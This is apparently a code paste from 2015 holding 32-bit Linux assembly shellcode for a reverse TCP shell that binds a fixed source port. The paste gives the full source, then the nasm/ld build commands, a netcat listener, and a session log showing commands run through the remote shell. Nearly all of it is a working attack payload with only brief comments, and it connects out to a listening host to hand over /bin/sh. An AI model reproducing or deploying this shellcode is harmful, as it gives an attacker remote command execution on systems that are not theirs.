
#Reverse TCP bind shell setting source port

Dec 4th, 2015
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  1. SERVER# cat sc.asm
  2. BITS 32
  3. section .txt
  4. global _start
  5. _start:
  6. ; sockfd=socket(AF_INET,SOCK_STREAM,0)
  7. ; sockfd=socket(2,1,0)
  8. push byte 0x66 ; socketcall number (102)
  9. pop eax
  10. cdq ; xor edx,edx
  11. xor ebx,ebx
  12. inc ebx ; ebx=0x00000001 (socket)
  13. push edx ; edx=0x00000000
  14. push byte 0x01
  15. push byte 0x02
  16. mov ecx,esp
  17. int 0x80 ; system call
  18. xchg esi,eax
  19. ; bind(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))
  20. ; bind(sockfd,[2,4321,0],16)
  21. push byte 0x66 ; socketcall number (102)
  22. pop eax
  23. inc ebx ; ebx=0x00000002 (bind)
  24. push edx ; edx=0x00000000 (Any available source IP)
  25. push word 0xe110 ; source port = 4321
  26. push word bx ; 0x0002
  27. mov ecx,esp
  28. push byte 0x10 ; 16
  29. push ecx
  30. push esi
  31. mov ecx,esp
  32. int 0x80 ; system call
  33. ; connect(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))
  34. ; connect(sockfd,[2,1234,],16)
  35. push byte 0x66 ; socketcall number (102)
  36. pop eax
  37. push dword 0x01bbbb7f ;
  38. xor ecx,ecx
  39. mov word [esp+1],cx ; destination ip =
  40. push word 0xd204 ; destination port = 1234
  41. push word bx ; 0x0002
  42. mov ecx,esp
  43. push byte 0x10 ; 16
  44. push ecx
  45. push esi
  46. mov ecx,esp
  47. inc ebx ; ebx=0x00000003 (connect)
  48. int 0x80 ; system call
  49. xchg ebx,esi
  50. ; dup2(cfd,i)
  51. push byte 0x2
  52. pop ecx
  53. dup_loop:
  54. mov byte al,0x3f ; dup2 number (63)
  55. int 0x80 ; system call
  56. dec ecx
  57. jns dup_loop
  58. ; execve("/bin/sh",shell,NULL)
  59. xor eax,eax
  60. mov byte al,11 ; system call number
  61. push edx ; \0
  62. push long 0x68732f2f ; hs//
  63. push long 0x6e69622f ; nib/
  64. mov ebx,esp ; first parameter
  65. push edx
  66. mov edx,esp ; third parameter
  67. push ebx
  68. mov ecx,esp ; second parameter
  69. int 0x80 ; system call
  71. SERVER# nasm -f elf sc.asm && ld -o sc sc.o
  72. CLIENT# nc -lv 1234
  73. SERVER# ./sc
  75. Connection from [] port 1234 [tcp/*] accepted (family 2, sport 4321)
  76. hostname
  77. SERVER
  78. exit
  79. CLIENT#
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